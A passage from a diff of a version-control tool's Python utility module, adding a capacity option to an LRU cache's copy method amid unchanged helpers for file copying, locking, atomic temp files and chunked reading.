                     self._movetohead(node)
                     self._head = node.next
                 # Additional dict methods.
                 def get(self, k, default=None):
                     try:
                         return self._cache[k].value
                     except KeyError:
                         return default
                 def clear(self):
                     n = self._head
                     while n.key is not _notset:
                         n.markempty()
                         n = n.next
                     self._cache.clear()
-                def copy(self):
+                def copy(self, capacity=None):
-                    result = lrucachedict(self.capacity)
+                    """Create a new cache as a copy of the current one.
+                    By default, the new cache has the same capacity as the existing one.
+                    But, the cache capacity can be changed as part of performing the
+                    copy.
+                    Items in the copy have an insertion/access order matching this
+                    instance.
+                    """
+                    capacity = capacity or self.capacity
+                    result = lrucachedict(capacity)
                     # We copy entries by iterating in oldest-to-newest order so the copy
                     # has the correct ordering.
                     # Find the first non-empty entry.
                     n = self._head.prev
                     while n.key is _notset and n is not self._head:
                         n = n.prev
+                    # We could potentially skip the first N items when decreasing capacity.
+                    # But let's keep it simple unless it is a performance problem.
                     for i in range(len(self._cache)):
                         result[n.key] = n.value
                         n = n.prev
                     return result
                 def _movetohead(self, node):
                     """Mark a node as the newest, making it the new head.
                     When a node is accessed, it becomes the freshest entry in the LRU
                     list, which is denoted by self._head.
                     Visually, let's make ``N`` the new head node (* denotes head):
                         previous/oldest <-> head <-> next/next newest
                         ----<->--- A* ---<->-----
                         |                       |
                         E <-> D <-> N <-> C <-> B
                     To:
                         ----<->--- N* ---<->-----
                         |                       |
                         E <-> D <-> C <-> B <-> A
                     This requires the following moves:
                        C.next = D  (node.prev.next = node.next)
                        D.prev = C  (node.next.prev = node.prev)
                        E.next = N  (head.prev.next = node)
                        N.prev = E  (node.prev = head.prev)
                        N.next = A  (node.next = head)
                        A.prev = N  (head.prev = node)
                     """
                     head = self._head
                     # C.next = D
                     node.prev.next = node.next
                     # D.prev = C
                     node.next.prev = node.prev
                     # N.prev = E
                     node.prev = head.prev
                     # N.next = A
                     # It is tempting to do just "head" here, however if node is
                     # adjacent to head, this will do bad things.
                     node.next = head.prev.next
                     # E.next = N
                     node.next.prev = node
                     # A.prev = N
                     node.prev.next = node
                     self._head = node
                 def _addcapacity(self):
                     """Add a node to the circular linked list.
                     The new node is inserted before the head node.
                     """
                     head = self._head
                     node = _lrucachenode()
                     head.prev.next = node
                     node.prev = head.prev
                     node.next = head
                     head.prev = node
                     self._size += 1
                     return node
             def lrucachefunc(func):
                 '''cache most recent results of function calls'''
                 cache = {}
                 order = collections.deque()
                 if func.__code__.co_argcount == 1:
                     def f(arg):
                         if arg not in cache:
                             if len(cache) > 20:
                                 del cache[order.popleft()]
                             cache[arg] = func(arg)
                         else:
                             order.remove(arg)
                         order.append(arg)
                         return cache[arg]
                 else:
                     def f(*args):
                         if args not in cache:
                             if len(cache) > 20:
                                 del cache[order.popleft()]
                             cache[args] = func(*args)
                         else:
                             order.remove(args)
                         order.append(args)
                         return cache[args]
                 return f
             class propertycache(object):
                 def __init__(self, func):
                     self.func = func
                     self.name = func.__name__
                 def __get__(self, obj, type=None):
                     result = self.func(obj)
                     self.cachevalue(obj, result)
                     return result
                 def cachevalue(self, obj, value):
                     # __dict__ assignment required to bypass __setattr__ (eg: repoview)
                     obj.__dict__[self.name] = value
             def clearcachedproperty(obj, prop):
                 '''clear a cached property value, if one has been set'''
                 if prop in obj.__dict__:
                     del obj.__dict__[prop]
             def increasingchunks(source, min=1024, max=65536):
                 '''return no less than min bytes per chunk while data remains,
                 doubling min after each chunk until it reaches max'''
                 def log2(x):
                     if not x:
                         return 0
                     i = 0
                     while x:
                         x >>= 1
                         i += 1
                     return i - 1
                 buf = []
                 blen = 0
                 for chunk in source:
                     buf.append(chunk)
                     blen += len(chunk)
                     if blen >= min:
                         if min < max:
                             min = min << 1
                             nmin = 1 << log2(blen)
                             if nmin > min:
                                 min = nmin
                             if min > max:
                                 min = max
                         yield ''.join(buf)
                         blen = 0
                         buf = []
                 if buf:
                     yield ''.join(buf)
             def always(fn):
                 return True
             def never(fn):
                 return False
             def nogc(func):
                 """disable garbage collector
                 Python's garbage collector triggers a GC each time a certain number of
                 container objects (the number being defined by gc.get_threshold()) are
                 allocated even when marked not to be tracked by the collector. Tracking has
                 no effect on when GCs are triggered, only on what objects the GC looks
                 into. As a workaround, disable GC while building complex (huge)
                 containers.
                 This garbage collector issue have been fixed in 2.7. But it still affect
                 CPython's performance.
                 """
                 def wrapper(*args, **kwargs):
                     gcenabled = gc.isenabled()
                     gc.disable()
                     try:
                         return func(*args, **kwargs)
                     finally:
                         if gcenabled:
                             gc.enable()
                 return wrapper
             if pycompat.ispypy:
                 # PyPy runs slower with gc disabled
                 nogc = lambda x: x
             def pathto(root, n1, n2):
                 '''return the relative path from one place to another.
                 root should use os.sep to separate directories
                 n1 should use os.sep to separate directories
                 n2 should use "/" to separate directories
                 returns an os.sep-separated path.
                 If n1 is a relative path, it's assumed it's
                 relative to root.
                 n2 should always be relative to root.
                 '''
                 if not n1:
                     return localpath(n2)
                 if os.path.isabs(n1):
                     if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
                         return os.path.join(root, localpath(n2))
                     n2 = '/'.join((pconvert(root), n2))
                 a, b = splitpath(n1), n2.split('/')
                 a.reverse()
                 b.reverse()
                 while a and b and a[-1] == b[-1]:
                     a.pop()
                     b.pop()
                 b.reverse()
                 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
             # the location of data files matching the source code
             if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
                 # executable version (py2exe) doesn't support __file__
                 datapath = os.path.dirname(pycompat.sysexecutable)
             else:
                 datapath = os.path.dirname(pycompat.fsencode(__file__))
             i18n.setdatapath(datapath)
             def checksignature(func):
                 '''wrap a function with code to check for calling errors'''
                 def check(*args, **kwargs):
                     try:
                         return func(*args, **kwargs)
                     except TypeError:
                         if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                             raise error.SignatureError
                         raise
                 return check
             # a whilelist of known filesystems where hardlink works reliably
             _hardlinkfswhitelist = {
                 'apfs',
                 'btrfs',
                 'ext2',
                 'ext3',
                 'ext4',
                 'hfs',
                 'jfs',
                 'NTFS',
                 'reiserfs',
                 'tmpfs',
                 'ufs',
                 'xfs',
                 'zfs',
             }
             def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
                 '''copy a file, preserving mode and optionally other stat info like
                 atime/mtime
                 checkambig argument is used with filestat, and is useful only if
                 destination file is guarded by any lock (e.g. repo.lock or
                 repo.wlock).
                 copystat and checkambig should be exclusive.
                 '''
                 assert not (copystat and checkambig)
                 oldstat = None
                 if os.path.lexists(dest):
                     if checkambig:
                         oldstat = checkambig and filestat.frompath(dest)
                     unlink(dest)
                 if hardlink:
                     # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
                     # unless we are confident that dest is on a whitelisted filesystem.
                     try:
                         fstype = getfstype(os.path.dirname(dest))
                     except OSError:
                         fstype = None
                     if fstype not in _hardlinkfswhitelist:
                         hardlink = False
                 if hardlink:
                     try:
                         oslink(src, dest)
                         return
                     except (IOError, OSError):
                         pass # fall back to normal copy
                 if os.path.islink(src):
                     os.symlink(os.readlink(src), dest)
                     # copytime is ignored for symlinks, but in general copytime isn't needed
                     # for them anyway
                 else:
                     try:
                         shutil.copyfile(src, dest)
                         if copystat:
                             # copystat also copies mode
                             shutil.copystat(src, dest)
                         else:
                             shutil.copymode(src, dest)
                             if oldstat and oldstat.stat:
                                 newstat = filestat.frompath(dest)
                                 if newstat.isambig(oldstat):
                                     # stat of copied file is ambiguous to original one
                                     advanced = (
                                         oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                                     os.utime(dest, (advanced, advanced))
                     except shutil.Error as inst:
                         raise error.Abort(str(inst))
             def copyfiles(src, dst, hardlink=None, progress=None):
                 """Copy a directory tree using hardlinks if possible."""
                 num = 0
                 def settopic():
                     if progress:
                         progress.topic = _('linking') if hardlink else _('copying')
                 if os.path.isdir(src):
                     if hardlink is None:
                         hardlink = (os.stat(src).st_dev ==
                                     os.stat(os.path.dirname(dst)).st_dev)
                     settopic()
                     os.mkdir(dst)
                     for name, kind in listdir(src):
                         srcname = os.path.join(src, name)
                         dstname = os.path.join(dst, name)
                         hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
                         num += n
                 else:
                     if hardlink is None:
                         hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                                     os.stat(os.path.dirname(dst)).st_dev)
                     settopic()
                     if hardlink:
                         try:
                             oslink(src, dst)
                         except (IOError, OSError):
                             hardlink = False
                             shutil.copy(src, dst)
                     else:
                         shutil.copy(src, dst)
                     num += 1
                     if progress:
                         progress.increment()
                 return hardlink, num
             _winreservednames = {
                 'con', 'prn', 'aux', 'nul',
                 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
                 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
             }
             _winreservedchars = ':*?"<>|'
             def checkwinfilename(path):
                 r'''Check that the base-relative path is a valid filename on Windows.
                 Returns None if the path is ok, or a UI string describing the problem.
                 >>> checkwinfilename(b"just/a/normal/path")
                 >>> checkwinfilename(b"foo/bar/con.xml")
                 "filename contains 'con', which is reserved on Windows"
                 >>> checkwinfilename(b"foo/con.xml/bar")
                 "filename contains 'con', which is reserved on Windows"
                 >>> checkwinfilename(b"foo/bar/xml.con")
                 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
                 "filename contains 'AUX', which is reserved on Windows"
                 >>> checkwinfilename(b"foo/bar/bla:.txt")
                 "filename contains ':', which is reserved on Windows"
                 >>> checkwinfilename(b"foo/bar/b\07la.txt")
                 "filename contains '\\x07', which is invalid on Windows"
                 >>> checkwinfilename(b"foo/bar/bla ")
                 "filename ends with ' ', which is not allowed on Windows"
                 >>> checkwinfilename(b"../bar")
                 >>> checkwinfilename(b"foo\\")
                 "filename ends with '\\', which is invalid on Windows"
                 >>> checkwinfilename(b"foo\\/bar")
                 "directory name ends with '\\', which is invalid on Windows"
                 '''
                 if path.endswith('\\'):
                     return _("filename ends with '\\', which is invalid on Windows")
                 if '\\/' in path:
                     return _("directory name ends with '\\', which is invalid on Windows")
                 for n in path.replace('\\', '/').split('/'):
                     if not n:
                         continue
                     for c in _filenamebytestr(n):
                         if c in _winreservedchars:
                             return _("filename contains '%s', which is reserved "
                                      "on Windows") % c
                         if ord(c) <= 31:
                             return _("filename contains '%s', which is invalid "
                                      "on Windows") % stringutil.escapestr(c)
                     base = n.split('.')[0]
                     if base and base.lower() in _winreservednames:
                         return _("filename contains '%s', which is reserved "
                                  "on Windows") % base
                     t = n[-1:]
                     if t in '. ' and n not in '..':
                         return _("filename ends with '%s', which is not allowed "
                                  "on Windows") % t
             if pycompat.iswindows:
                 checkosfilename = checkwinfilename
                 timer = time.clock
             else:
                 checkosfilename = platform.checkosfilename
                 timer = time.time
             if safehasattr(time, "perf_counter"):
                 timer = time.perf_counter
             def makelock(info, pathname):
                 """Create a lock file atomically if possible
                 This may leave a stale lock file if symlink isn't supported and signal
                 interrupt is enabled.
                 """
                 try:
                     return os.symlink(info, pathname)
                 except OSError as why:
                     if why.errno == errno.EEXIST:
                         raise
                 except AttributeError: # no symlink in os
                     pass
                 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
                 ld = os.open(pathname, flags)
                 os.write(ld, info)
                 os.close(ld)
             def readlock(pathname):
                 try:
                     return os.readlink(pathname)
                 except OSError as why:
                     if why.errno not in (errno.EINVAL, errno.ENOSYS):
                         raise
                 except AttributeError: # no symlink in os
                     pass
                 fp = posixfile(pathname, 'rb')
                 r = fp.read()
                 fp.close()
                 return r
             def fstat(fp):
                 '''stat file object that may not have fileno method.'''
                 try:
                     return os.fstat(fp.fileno())
                 except AttributeError:
                     return os.stat(fp.name)
             # File system features
             def fscasesensitive(path):
                 """
                 Return true if the given path is on a case-sensitive filesystem
                 Requires a path (like /foo/.hg) ending with a foldable final
                 directory component.
                 """
                 s1 = os.lstat(path)
                 d, b = os.path.split(path)
                 b2 = b.upper()
                 if b == b2:
                     b2 = b.lower()
                     if b == b2:
                         return True # no evidence against case sensitivity
                 p2 = os.path.join(d, b2)
                 try:
                     s2 = os.lstat(p2)
                     if s2 == s1:
                         return False
                     return True
                 except OSError:
                     return True
             try:
                 import re2
                 _re2 = None
             except ImportError:
                 _re2 = False
             class _re(object):
                 def _checkre2(self):
                     global _re2
                     try:
                         # check if match works, see issue3964
                         _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
                     except ImportError:
                         _re2 = False
                 def compile(self, pat, flags=0):
                     '''Compile a regular expression, using re2 if possible
                     For best performance, use only re2-compatible regexp features. The
                     only flags from the re module that are re2-compatible are
                     IGNORECASE and MULTILINE.'''
                     if _re2 is None:
                         self._checkre2()
                     if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
                         if flags & remod.IGNORECASE:
                             pat = '(?i)' + pat
                         if flags & remod.MULTILINE:
                             pat = '(?m)' + pat
                         try:
                             return re2.compile(pat)
                         except re2.error:
                             pass
                     return remod.compile(pat, flags)
                 @propertycache
                 def escape(self):
                     '''Return the version of escape corresponding to self.compile.
                     This is imperfect because whether re2 or re is used for a particular
                     function depends on the flags, etc, but it's the best we can do.
                     '''
                     global _re2
                     if _re2 is None:
                         self._checkre2()
                     if _re2:
                         return re2.escape
                     else:
                         return remod.escape
             re = _re()
             _fspathcache = {}
             def fspath(name, root):
                 '''Get name in the case stored in the filesystem
                 The name should be relative to root, and be normcase-ed for efficiency.
                 Note that this function is unnecessary, and should not be
                 called, for case-sensitive filesystems (simply because it's expensive).
                 The root should be normcase-ed, too.
                 '''
                 def _makefspathcacheentry(dir):
                     return dict((normcase(n), n) for n in os.listdir(dir))
                 seps = pycompat.ossep
                 if pycompat.osaltsep:
                     seps = seps + pycompat.osaltsep
                 # Protect backslashes. This gets silly very quickly.
                 seps.replace('\\','\\\\')
                 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
                 dir = os.path.normpath(root)
                 result = []
                 for part, sep in pattern.findall(name):
                     if sep:
                         result.append(sep)
                         continue
                     if dir not in _fspathcache:
                         _fspathcache[dir] = _makefspathcacheentry(dir)
                     contents = _fspathcache[dir]
                     found = contents.get(part)
                     if not found:
                         # retry "once per directory" per "dirstate.walk" which
                         # may take place for each patches of "hg qpush", for example
                         _fspathcache[dir] = contents = _makefspathcacheentry(dir)
                         found = contents.get(part)
                     result.append(found or part)
                     dir = os.path.join(dir, part)
                 return ''.join(result)
             def checknlink(testfile):
                 '''check whether hardlink count reporting works properly'''
                 # testfile may be open, so we need a separate file for checking to
                 # work around issue2543 (or testfile may get lost on Samba shares)
                 f1, f2, fp = None, None, None
                 try:
                     fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                               suffix='1~', dir=os.path.dirname(testfile))
                     os.close(fd)
                     f2 = '%s2~' % f1[:-2]
                     oslink(f1, f2)
                     # nlinks() may behave differently for files on Windows shares if
                     # the file is open.
                     fp = posixfile(f2)
                     return nlinks(f2) > 1
                 except OSError:
                     return False
                 finally:
                     if fp is not None:
                         fp.close()
                     for f in (f1, f2):
                         try:
                             if f is not None:
                                 os.unlink(f)
                         except OSError:
                             pass
             def endswithsep(path):
                 '''Check path ends with os.sep or os.altsep.'''
                 return (path.endswith(pycompat.ossep)
                         or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
             def splitpath(path):
                 '''Split path by os.sep.
                 Note that this function does not use os.altsep because this is
                 an alternative of simple "xxx.split(os.sep)".
                 It is recommended to use os.path.normpath() before using this
                 function if need.'''
                 return path.split(pycompat.ossep)
             def mktempcopy(name, emptyok=False, createmode=None):
                 """Create a temporary file with the same contents from name
                 The permission bits are copied from the original file.
                 If the temporary file is going to be truncated immediately, you
                 can use emptyok=True as an optimization.
                 Returns the name of the temporary file.
                 """
                 d, fn = os.path.split(name)
                 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
                 os.close(fd)
                 # Temporary files are created with mode 0600, which is usually not
                 # what we want.  If the original file already exists, just copy
                 # its mode.  Otherwise, manually obey umask.
                 copymode(name, temp, createmode)
                 if emptyok:
                     return temp
                 try:
                     try:
                         ifp = posixfile(name, "rb")
                     except IOError as inst:
                         if inst.errno == errno.ENOENT:
                             return temp
                         if not getattr(inst, 'filename', None):
                             inst.filename = name
                         raise
                     ofp = posixfile(temp, "wb")
                     for chunk in filechunkiter(ifp):
                         ofp.write(chunk)
                     ifp.close()
                     ofp.close()
                 except: # re-raises
                     try:
                         os.unlink(temp)
                     except OSError:
                         pass
                     raise
                 return temp
             class filestat(object):
                 """help to exactly detect change of a file
                 'stat' attribute is result of 'os.stat()' if specified 'path'
                 exists. Otherwise, it is None. This can avoid preparative
                 'exists()' examination on client side of this class.
                 """
                 def __init__(self, stat):
                     self.stat = stat
                 @classmethod
                 def frompath(cls, path):
                     try:
                         stat = os.stat(path)
                     except OSError as err:
                         if err.errno != errno.ENOENT:
                             raise
                         stat = None
                     return cls(stat)
                 @classmethod
                 def fromfp(cls, fp):
                     stat = os.fstat(fp.fileno())
                     return cls(stat)
                 __hash__ = object.__hash__
                 def __eq__(self, old):
                     try:
                         # if ambiguity between stat of new and old file is
                         # avoided, comparison of size, ctime and mtime is enough
                         # to exactly detect change of a file regardless of platform
                         return (self.stat.st_size == old.stat.st_size and
                                 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                                 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
                     except AttributeError:
                         pass
                     try:
                         return self.stat is None and old.stat is None
                     except AttributeError:
                         return False
                 def isambig(self, old):
                     """Examine whether new (= self) stat is ambiguous against old one
                     "S[N]" below means stat of a file at N-th change:
                     - S[n-1].ctime  < S[n].ctime: can detect change of a file
                     - S[n-1].ctime == S[n].ctime
                       - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
                       - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
                       - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
                     - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)
                     Case (*2) above means that a file was changed twice or more at
                     same time in sec (= S[n-1].ctime), and comparison of timestamp
                     is ambiguous.
                     Base idea to avoid such ambiguity is "advance mtime 1 sec, if
                     timestamp is ambiguous".
                     But advancing mtime only in case (*2) doesn't work as
                     expected, because naturally advanced S[n].mtime in case (*1)
                     might be equal to manually advanced S[n-1 or earlier].mtime.
                     Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
                     treated as ambiguous regardless of mtime, to avoid overlooking
                     by confliction between such mtime.
                     Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
                     S[n].mtime", even if size of a file isn't changed.
                     """
                     try:
                         return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
                     except AttributeError:
                         return False
                 def avoidambig(self, path, old):
                     """Change file stat of specified path to avoid ambiguity
                     'old' should be previous filestat of 'path'.
                     This skips avoiding ambiguity, if a process doesn't have
                     appropriate privileges for 'path'. This returns False in this
                     case.
                     Otherwise, this returns True, as "ambiguity is avoided".
                     """
                     advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                     try:
                         os.utime(path, (advanced, advanced))
                     except OSError as inst:
                         if inst.errno == errno.EPERM:
                             # utime() on the file created by another user causes EPERM,
                             # if a process doesn't have appropriate privileges
                             return False
                         raise
                     return True
                 def __ne__(self, other):
                     return not self == other
             class atomictempfile(object):
                 '''writable file object that atomically updates a file
                 All writes will go to a temporary copy of the original file. Call
                 close() when you are done writing, and atomictempfile will rename
                 the temporary copy to the original name, making the changes
                 visible. If the object is destroyed without being closed, all your
                 writes are discarded.
                 checkambig argument of constructor is used with filestat, and is
                 useful only if target file is guarded by any lock (e.g. repo.lock
                 or repo.wlock).
                 '''
                 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
                     self.__name = name      # permanent name
                     self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                                 createmode=createmode)
                     self._fp = posixfile(self._tempname, mode)
                     self._checkambig = checkambig
                     # delegated methods
                     self.read = self._fp.read
                     self.write = self._fp.write
                     self.seek = self._fp.seek
                     self.tell = self._fp.tell
                     self.fileno = self._fp.fileno
                 def close(self):
                     if not self._fp.closed:
                         self._fp.close()
                         filename = localpath(self.__name)
                         oldstat = self._checkambig and filestat.frompath(filename)
                         if oldstat and oldstat.stat:
                             rename(self._tempname, filename)
                             newstat = filestat.frompath(filename)
                             if newstat.isambig(oldstat):
                                 # stat of changed file is ambiguous to original one
                                 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                                 os.utime(filename, (advanced, advanced))
                         else:
                             rename(self._tempname, filename)
                 def discard(self):
                     if not self._fp.closed:
                         try:
                             os.unlink(self._tempname)
                         except OSError:
                             pass
                         self._fp.close()
                 def __del__(self):
                     if safehasattr(self, '_fp'): # constructor actually did something
                         self.discard()
                 def __enter__(self):
                     return self
                 def __exit__(self, exctype, excvalue, traceback):
                     if exctype is not None:
                         self.discard()
                     else:
                         self.close()
             def unlinkpath(f, ignoremissing=False, rmdir=True):
                 """unlink and remove the directory if it is empty"""
                 if ignoremissing:
                     tryunlink(f)
                 else:
                     unlink(f)
                 if rmdir:
                     # try removing directories that might now be empty
                     try:
                         removedirs(os.path.dirname(f))
                     except OSError:
                         pass
             def tryunlink(f):
                 """Attempt to remove a file, ignoring ENOENT errors."""
                 try:
                     unlink(f)
                 except OSError as e:
                     if e.errno != errno.ENOENT:
                         raise
             def makedirs(name, mode=None, notindexed=False):
                 """recursive directory creation with parent mode inheritance
                 Newly created directories are marked as "not to be indexed by
                 the content indexing service", if ``notindexed`` is specified
                 for "write" mode access.
                 """
                 try:
                     makedir(name, notindexed)
                 except OSError as err:
                     if err.errno == errno.EEXIST:
                         return
                     if err.errno != errno.ENOENT or not name:
                         raise
                     parent = os.path.dirname(os.path.abspath(name))
                     if parent == name:
                         raise
                     makedirs(parent, mode, notindexed)
                     try:
                         makedir(name, notindexed)
                     except OSError as err:
                         # Catch EEXIST to handle races
                         if err.errno == errno.EEXIST:
                             return
                         raise
                 if mode is not None:
                     os.chmod(name, mode)
             def readfile(path):
                 with open(path, 'rb') as fp:
                     return fp.read()
             def writefile(path, text):
                 with open(path, 'wb') as fp:
                     fp.write(text)
             def appendfile(path, text):
                 with open(path, 'ab') as fp:
                     fp.write(text)
             class chunkbuffer(object):
                 """Allow arbitrary sized chunks of data to be efficiently read from an
                 iterator over chunks of arbitrary size."""
                 def __init__(self, in_iter):
                     """in_iter is the iterator that's iterating over the input chunks."""
                     def splitbig(chunks):
                         for chunk in chunks:
                             if len(chunk) > 2**20:
                                 pos = 0
                                 while pos < len(chunk):
                                     end = pos + 2 ** 18
                                     yield chunk[pos:end]
                                     pos = end
                             else:
                                 yield chunk
                     self.iter = splitbig(in_iter)
                     self._queue = collections.deque()
                     self._chunkoffset = 0
                 def read(self, l=None):
                     """Read L bytes of data from the iterator of chunks of data.
                     Returns less than L bytes if the iterator runs dry.
                     If size parameter is omitted, read everything"""
                     if l is None:
                         return ''.join(self.iter)
                     left = l
                     buf = []
                     queue = self._queue
                     while left > 0:
                         # refill the queue
                         if not queue:
                             target = 2**18
                             for chunk in self.iter:
                                 queue.append(chunk)
                                 target -= len(chunk)
                                 if target <= 0:
                                     break
                             if not queue:
                                 break
                         # The easy way to do this would be to queue.popleft(), modify the
                         # chunk (if necessary), then queue.appendleft(). However, for cases
                         # where we read partial chunk content, this incurs 2 dequeue
                         # mutations and creates a new str for the remaining chunk in the
                         # queue. Our code below avoids this overhead.
                         chunk = queue[0]
                         chunkl = len(chunk)
                         offset = self._chunkoffset
                         # Use full chunk.
                         if offset == 0 and left >= chunkl:
                             left -= chunkl
                             queue.popleft()
                             buf.append(chunk)
                             # self._chunkoffset remains at 0.
                             continue
                         chunkremaining = chunkl - offset
                         # Use all of unconsumed part of chunk.
                         if left >= chunkremaining:
                             left -= chunkremaining
                             queue.popleft()
                             # offset == 0 is enabled by block above, so this won't merely
                             # copy via ``chunk[0:]``.
                             buf.append(chunk[offset:])
                             self._chunkoffset = 0
                         # Partial chunk needed.
                         else:
                             buf.append(chunk[offset:offset + left])
                             self._chunkoffset += left
                             left -= chunkremaining
                     return ''.join(buf)
             def filechunkiter(f, size=131072, limit=None):
                 """Create a generator that produces the data in the file size
                 (default 131072) bytes at a time, up to optional limit (default is
                 to read all data).  Chunks may be less than size bytes if the
                 chunk is the last chunk in the file, or the file is a socket or
                 some other type of file that sometimes reads less data than is
                 requested."""
                 assert size >= 0
                 assert limit is None or limit >= 0
                 while True:
                     if limit is None:
                         nbytes = size
                     else:
                         nbytes = min(limit, size)
                     s = nbytes and f.read(nbytes)
                     if not s:
                         break
                     if limit:
                         limit -= len(s)
                     yield s
             class cappedreader(object):
                 """A file object proxy that allows reading up to N bytes.
                 Given a source file object, instances of this type allow reading up to
                 N bytes from that source file object. Attempts to read past the allowed
                 limit are treated as EOF.
                 It is assumed that I/O is not performed on the original file object
                 in addition to I/O that is performed by this instance. If there is,
                 state tracking will get out of sync and unexpected results will ensue.
                 """
                 def __init__(self, fh, limit):
                     """Allow reading up to <limit> bytes from <fh>."""
                     self._fh = fh
                     self._left = limit
                 def read(self, n=-1):
                     if not self._left:
                         return b''
                     if n < 0:
                         n = self._left
                     data = self._fh.read(min(n, self._left))
                     self._left -= len(data)
                     assert self._left >= 0
                     return data
                 def readinto(self, b):
                     res = self.read(len(b))
                     if res is None:
                         return None
                     b[0:len(res)] = res
                     return len(res)
             def unitcountfn(*unittable):
                 '''return a function that renders a readable count of some quantity'''
                 def go(count):
                     for multiplier, divisor, format in unittable:
                         if abs(count) >= divisor * multiplier:
                             return format % (count / float(divisor))
                     return unittable[-1][2] % count
                 return go
             def processlinerange(fromline, toline):
                 """Check that linerange <fromline>:<toline> makes sense and return a
 -based range.
                 >>> processlinerange(10, 20)
                 (9, 20)
                 >>> processlinerange(2, 1)
                 Traceback (most recent call last):
                     ...
                 ParseError: line range must be positive
                 >>> processlinerange(0, 5)
                 Traceback (most recent call last):
                     ...
                 ParseError: fromline must be strictly positive
                 """
                 if toline - fromline < 0:
                     raise error.ParseError(_("line range must be positive"))
                 if fromline < 1:
                     raise error.ParseError(_("fromline must be strictly positive"))
                 return fromline - 1, toline
             bytecount = unitcountfn(
                 (100, 1 << 30, _('%.0f GB')),
                 (10, 1 << 30, _('%.1f GB')),
                 (1, 1 << 30, _('%.2f GB')),
                 (100, 1 << 20, _('%.0f MB')),
                 (10, 1 << 20, _('%.1f MB')),
                 (1, 1 << 20, _('%.2f MB')),
                 (100, 1 << 10, _('%.0f KB')),
                 (10, 1 << 10, _('%.1f KB')),
                 (1, 1 << 10, _('%.2f KB')),
                 (1, 1, _('%.0f bytes')),
                 )
             class transformingwriter(object):
                 """Writable file wrapper to transform data by function"""
                 def __init__(self, fp, encode):
                     self._fp = fp
                     self._encode = encode
                 def close(self):
                     self._fp.close()
                 def flush(self):
                     self._fp.flush()
                 def write(self, data):
                     return self._fp.write(self._encode(data))
             # Matches a single EOL which can either be a CRLF where repeated CR
             # are removed or a LF. We do not care about old Macintosh files, so a
             # stray CR is an error.
             _eolre = remod.compile(br'\r*\n')
             def tolf(s):
                 return _eolre.sub('\n', s)
             def tocrlf(s):
                 return _eolre.sub('\r\n', s)
             def _crlfwriter(fp):
                 return transformingwriter(fp, tocrlf)
             if pycompat.oslinesep == '\r\n':
                 tonativeeol = tocrlf
                 fromnativeeol = tolf
                 nativeeolwriter = _crlfwriter
             else:
                 tonativeeol = pycompat.identity
                 fromnativeeol = pycompat.identity
                 nativeeolwriter = pycompat.identity
             if (pyplatform.python_implementation() == 'CPython' and
                 sys.version_info < (3, 0)):
                 # There is an issue in CPython that some IO methods do not handle EINTR
                 # correctly. The following table shows what CPython version (and functions)
                 # are affected (buggy: has the EINTR bug, okay: otherwise):
                 #
                 #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
                 #   --------------------------------------------------
                 #    fp.__iter__ | buggy   | buggy           | okay
                 #    fp.read*    | buggy   | okay [1]        | okay
                 #
                 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
                 #
                 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
                 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
                 #
                 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
                 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
                 # CPython 2, because CPython 2 maintains an internal readahead buffer for
                 # fp.__iter__ but not other fp.read* methods.
                 #
                 # On modern systems like Linux, the "read" syscall cannot be interrupted
                 # when reading "fast" files like on-disk files. So the EINTR issue only
                 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
                 # files approximately as "fast" files and use the fast (unsafe) code path,
                 # to minimize the performance impact.
                 if sys.version_info >= (2, 7, 4):
                     # fp.readline deals with EINTR correctly, use it as a workaround.
                     def _safeiterfile(fp):
                         return iter(fp.readline, '')
                 else:
                     # fp.read* are broken too, manually deal with EINTR in a stupid way.
                     # note: this may block longer than necessary because of bufsize.
                     def _safeiterfile(fp, bufsize=4096):
                         fd = fp.fileno()
                         line = ''
                         while True:
                             try:
                                 buf = os.read(fd, bufsize)
                             except OSError as ex:
                                 # os.read only raises EINTR before any data is read
                                 if ex.errno == errno.EINTR:
                                     continue
                                 else:
                                     raise
                             line += buf
                             if '\n' in buf:
                                 splitted = line.splitlines(True)
                                 line = ''
                                 for l in splitted:
                                     if l[-1] == '\n':
                                         yield l
                                     else:
                                         line = l
                             if not buf:
                                 break
                         if line:
                             yield line
                 def iterfile(fp):
                     fastpath = True
